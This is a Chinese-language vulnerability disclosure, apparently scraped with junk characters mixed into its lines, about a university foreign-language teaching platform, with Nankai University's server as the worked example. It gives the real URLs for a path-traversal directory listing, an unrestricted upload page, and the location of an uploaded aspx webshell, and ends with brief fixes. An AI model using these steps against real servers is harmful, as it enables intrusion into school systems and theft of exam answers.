好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中$ U, h" k! K7 f _
* [6 u- C7 s( d+ u4 z) w1 f详细说明:, J3 ]( f& ~ @( p+ s
) O" h' A* F5 u! Q" S9 o以南开大学的为例:
! p3 f2 [( G7 q8 ~! F, J% C# `http://222.30.60.3/NPELS
% x! a, k0 P0 B7 D; nNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
; l4 M6 j" }. n" C<setting name="Update_CommonSvr_CommonService" serializeAs="String">, l4 {" G9 @ t
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
8 m2 z0 Y) d1 n</setting>
* L$ X0 T/ u0 i. ?2 [4 x及版本号
$ w9 \' G% B: e2 q! V<add key="TVersion" value="1, 0, 0, 2187">4 Z3 h( C A! g" z4 k4 K0 m
</add>" x1 d7 T2 v. z* O7 @
直接访问6 {( W4 F5 O& ]- S
http://222.30.60.3/NPELS/CommonService.asmx
4 I/ q) S: d' J& ^5 A使用GetTestClientFileList操作,直接 HTTP GET 列目录:
s+ n) h# Q2 x- i* Z* _' A; lhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
3 ~$ a0 X! A; _& ^& q进一步列目录(返回的网页很大,可以直接 wget 下来)
9 \" \+ ]: u, S. [# q, }9 chttp://222.30.60.3/NPELS/CommonS ... List?version=../../
0 y8 w5 R* e F + e+ t* e" p- f
发现
4 F+ y/ ]0 M8 r' o" J; B J4 Q2 khttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm' f$ a4 d2 \8 Z
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头1 }" b V: v; f' v" G
上传后继续列目录找到木马地址直接访问即可
a! N. g, n% L# l
/ | D3 D: R' Y9 sOOXX" q; s+ Z% b& a K1 Z
; B8 X: d- c( C* b' R f. K7 o
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
5 Q- Q; O ]; O- s漏洞证明:
6 e0 k) S% q' R9 Q / }) W: E+ N9 g& h- w
列目录:- x3 G! i& W* h
http://222.30.60.3/NPELS/CommonS ... List?version=../../
! M7 K5 I7 H; s3 j1 J' f文件上传:3 q$ W/ f/ p* \+ S2 X+ ^
http://222.30.60.3/npelsv/editor/editor.htm4 C4 x5 j4 O1 a6 m8 q# d5 W
; F; ~& O! z) X9 j上传木马:
1 @* \0 U" s: z Z: o/ {0 O2 i: }http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx/ z( n8 S5 W8 b4 _: i' P
$ H( H \& P0 R: o$ J4 h2 k0 g修复方案:! D5 `- X" N; ?$ L4 |: R
好像考试系统必须使用 CommonService.asmx
5 x. |8 ~. t& R& H/ p最好配置文件加密或者用别的方式不让它泄露出来" }' h9 g k$ b
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
: f# |; t1 i+ u/ ^0 P% H6 F |